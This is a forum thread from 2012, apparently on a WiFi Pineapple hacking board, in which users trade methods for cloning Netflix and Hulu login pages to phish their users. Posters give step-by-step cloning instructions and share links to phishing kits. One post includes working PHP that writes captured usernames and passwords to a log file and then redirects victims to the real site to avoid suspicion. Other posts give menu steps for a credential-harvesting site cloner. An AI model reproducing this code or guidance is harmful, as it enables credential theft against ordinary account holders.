mreidiv Posted March 19, 2012 Share Posted March 19, 2012 Has anyone got netflix or hulu to work with phishing. i tried following the tut but the code is different in these sites. If so can you send me the files so i can see how it was done or give me a tut. Quote Link to comment Share on other sites More sharing options...
singh763173 Posted March 20, 2012 Share Posted March 20, 2012 tut would be nice! so that other sites could be made also ;) Quote Link to comment Share on other sites More sharing options...
killuminati Posted March 20, 2012 Share Posted March 20, 2012 Check on YouTube guys. There's loads of videos out there on how to create a phishing page and also there's great tuts on a guys page on YouTube called security4plus. He started me off as I was completely lost. Slowly things start to make sense and you can soon realise you can use your imagination to modding the pineapple to how you like. Hope it helps! And make sure u like that guys videos. He's been knocking new ones out constantly! :) Quote Link to comment Share on other sites More sharing options...
mreidiv Posted March 21, 2012 Author Share Posted March 21, 2012 Check on YouTube guys. There's loads of videos out there on how to create a phishing page and also there's great tuts on a guys page on YouTube called security4plus. He started me off as I was completely lost. Slowly things start to make sense and you can soon realise you can use your imagination to modding the pineapple to how you like. Hope it helps! And make sure u like that guys videos. He's been knocking new ones out constantly! :) Thank you killuminati but what i was looking for is a tutorial on defrent types of phishing web pages like netflix and hulu the use diffrent encoding in their web pages so i would like to know how to set them pages up for phishing. Quote Link to comment Share on other sites More sharing options...
RebelCork Posted March 22, 2012 Share Posted March 22, 2012 Looking at the source files for Netflix, The actual login.php page is not on the home page. Why dont you try the following? Clone/Copy the standard front page of netflix and the login.php page to your MKIV Find the link to login.php and change it your desired location In the login.php from the website, and change the action method as suggested in the tutorials. Should work ! Try this and play around. Extra bonus points for learning basic html and php ! B) Quote Link to comment Share on other sites More sharing options...
mreidiv Posted March 22, 2012 Author Share Posted March 22, 2012 Looking at the source files for Netflix, The actual login.php page is not on the home page. Why dont you try the following? Clone/Copy the standard front page of netflix and the login.php page to your MKIV Find the link to login.php and change it your desired location In the login.php from the website, and change the action method as suggested in the tutorials. Should work ! Try this and play around. Extra bonus points for learning basic html and php ! B) thank you i have cloned the login and the first page and have tried changing by the tutorial on the web page but there is no "Action" in either page i have tried changing the href=.... to error.php to no avail, also i am working on learning html and php but once you try things many of time you get to a point where it just drives you crazy. so that is why i cam to the conclusion to ask for a little help form the community. Quote Link to comment Share on other sites More sharing options...
RebelCork Posted March 22, 2012 Share Posted March 22, 2012 Change it to a button that you can control so (point to error.php). The easiest thing to do is keep a 'snippets' tool handy and copy any 'useful' bits of code into it. That way, when you quickly want to change an element on a web page, you have a predefined bit of code that you need. With php/html, you can't do any damage, so play around and have fun! Quote Link to comment Share on other sites More sharing options...
reflex Posted March 24, 2012 Share Posted March 24, 2012 Here, some phishers that i made. Gimme a shout if you want anymore! http://www.mediafire.com/file/zfl51ra0la5eo1a/phishers.rar Have fun. reflex Quote Link to comment Share on other sites More sharing options...
CanadianTaco Posted March 24, 2012 Share Posted March 24, 2012 I used the tutorial found here: http://hak5.org/hack/pineapple-phishing Under "Modify a website to capture credentials" is where you want to read. Basically you're just editing the form action to your .php script thus sending the login info 'name' and 'pass' to you. Quote Link to comment Share on other sites More sharing options...
RebelCork Posted April 1, 2012 Share Posted April 1, 2012 Check this out: http://www.rohitab.com/discuss/topic/21438-fake-login-page-generator/ If it works, post it up for everyone else Quote Link to comment Share on other sites More sharing options...
webdirector Posted April 4, 2012 Share Posted April 4, 2012 Thanks reflex for the good share. Question: Is there a way to have it go to the real page after the user tried to login once ? I mean if he keeps on ending at the " Phishing" login he will get suspecious. Thanks Quote Link to comment Share on other sites More sharing options...
NotTheFed Posted April 6, 2012 Share Posted April 6, 2012 (edited) edited.. not changed up. one phish page I have is like this: www.target.com (line in dnspoof) since this site has a follow up signon of: https://online.target.com/signon I can use: header('Location: https://online.target.com/signon"); and the user is presented with the REAL logon page. (after params are written to phish.log) not perfect, but I am still working on this. does NOT work if you are redirecting back to the same url you are spoofing. *wish I new how to write PHP..but googling my way along* NTF Edited April 6, 2012 by NotTheFed Quote Link to comment Share on other sites More sharing options...
NotTheFed Posted April 6, 2012 Share Posted April 6, 2012 <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("/usb/logs/phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } if ($ref=="http://www.targetsite.com/targetsite.html") header("Location: https://online.targetsite.com/signon/"); ?> <html><head> <script type="text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html> THIS works.. and can be built up... redirection for the known sites that work, back\refresh for others. getting closer.. now if I can do the post portion. NTF Quote Link to comment Share on other sites More sharing options...
shadowmmm Posted April 6, 2012 Share Posted April 6, 2012 things we should get is like STEAM,HULU,NETFLIX,MINECRAFT(HAHA),etc. Quote Link to comment Share on other sites More sharing options...
Vulture Posted April 6, 2012 Share Posted April 6, 2012 These are super easy to setup guys, just follow these steps: 1) Pull up the page you need 2) Save the page 3) Open the page in a txt editor and remove all of the scripts that aren't necessary for the landing page 3) Download all resources on the page (images, css, etc) and put them into a folder ie "netflix" with the main page saved as netflix.html 4) Edit the main page and where you see the <form> tags for logging in, just change the POST method to error.php and set the username and password "name" attribute to name and pass respectively. 5) Your done! I will be releasing an updated phishing package in the near future containing an easy harvesting method, the one thing I am trying to figure out is how to redirect them to the real site after they have entered the credentials on the fake site. The issue I am having here is that this will probably need to effect iptables because we do not want dnsspoof to be redirecting them for just this single domain we are dealing with. Quote Link to comment Share on other sites More sharing options...
surbo Posted April 7, 2012 Share Posted April 7, 2012 If you guys want to clone a site like hulu's login page, just use (SET) on the backtrack security cd. Use the clone option and then use the saved html that SET builds. I don't think I will create a tutorial for this as I am really not sure what your ideas behind this are. If you figure it out more power to ya. -suRbo Quote Link to comment Share on other sites More sharing options...
mreidiv Posted April 7, 2012 Author Share Posted April 7, 2012 (edited) If you guys want to clone a site like hulu's login page, just use (SET) on the backtrack security cd. Use the clone option and then use the saved html that SET builds. I don't think I will create a tutorial for this as I am really not sure what your ideas behind this are. If you figure it out more power to ya. -suRbo Thank You suRbo But the idea is to learn how to do it manually with the different types of encoding on different pages. I am here to learn how to do things not be a script kiddie.. Lol btw: SET wont generate a clone for netflix But thanks for your input. Edited April 7, 2012 by mreidiv Quote Link to comment Share on other sites More sharing options...
NotTheFed Posted April 7, 2012 Share Posted April 7, 2012 (edited) here are the ones I use for netflix http://www.filefactory.com/file/7i14ry677cud/n/Archive_zip I use the net for all the .jpg with this site I use the main landing page (netflix.html) then the user clicks on (member sign in) that opens NetflixLogin.html the login.php then writes the name\pass to /usb/logs/phish.log and redirects to the real netflix site. NTF *edit* you will have to change the part for the redirect for netflix. didnt get that copied over to the login.php should be: f ($ref=="http://netflix.com/NetflixLogin.html") header("Location: https://signup.netflix.com/Login"); if ($ref=="http://www.netflix.com/NetflixLogin.html") header("Location: https://signup.netflix.com/Login"); Edited April 7, 2012 by NotTheFed Quote Link to comment Share on other sites More sharing options...
mreidiv Posted April 7, 2012 Author Share Posted April 7, 2012 here are the ones I use for netflix http://www.filefactory.com/file/7i14ry677cud/n/Archive_zip I use the net for all the .jpg with this site I use the main landing page (netflix.html) then the user clicks on (member sign in) that opens NetflixLogin.html the login.php then writes the name\pass to /usb/logs/phish.log and redirects to the real netflix site. NTF Thank you, NotTheFed, I will study it and see how you accomplished it. Quote Link to comment Share on other sites More sharing options...
surbo Posted April 7, 2012 Share Posted April 7, 2012 Thank You suRbo But the idea is to learn how to do it manually with the different types of encoding on different pages. I am here to learn how to do things not be a script kiddie.. Lol btw: SET wont generate a clone for netflix But thanks for your input. I will give it a go since you are not a skiddie =) You can reverse it for your education Quote Link to comment Share on other sites More sharing options...
surbo Posted April 7, 2012 Share Posted April 7, 2012 I will give it a go since you are not a skiddie =) You can reverse it for your education SET options 2 Website Attack Vectors 3 Credential Harvester Attack Method 2 Site Cloner put in the url you wish to clone use https or http Please make sure you have permission to test -later Quote Link to comment Share on other sites More sharing options...
mreidiv Posted April 7, 2012 Author Share Posted April 7, 2012 SET options 2 Website Attack Vectors 3 Credential Harvester Attack Method 2 Site Cloner put in the url you wish to clone use https or http Please make sure you have permission to test -later Thanks surbo, if it worked for you something may be messed up with mine it just sits there for about an hour and a half before it errors out. i used the same steps u described. Quote Link to comment Share on other sites More sharing options...
mreidiv Posted April 7, 2012 Author Share Posted April 7, 2012 (edited) All in one captive portal Mad Props For VulpiArgenti All i did was edit the paths to work on the pineapple No credit to me Only VulpiArgenti Can be used As a captive portal Login in page. Down Load Pinapple Version Here Or the Original Here. Edited April 25, 2012 by mreidiv Quote Link to comment Share on other sites More sharing options...
surbo Posted April 9, 2012 Share Posted April 9, 2012 All in one captive portal Mad Props For VulpiArgenti All i did was edit the paths to work on the pineapple No credit to me Only VulpiArgenti Can be used As a captive portal Login in page. Down Load Pinapple Version Here well done Quote Link to comment Share on other sites More sharing options...
shadowmmm Posted April 11, 2012 Share Posted April 11, 2012 so how did everybody implement that credentials page.anyone with a hulu or netflix phish site yet? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.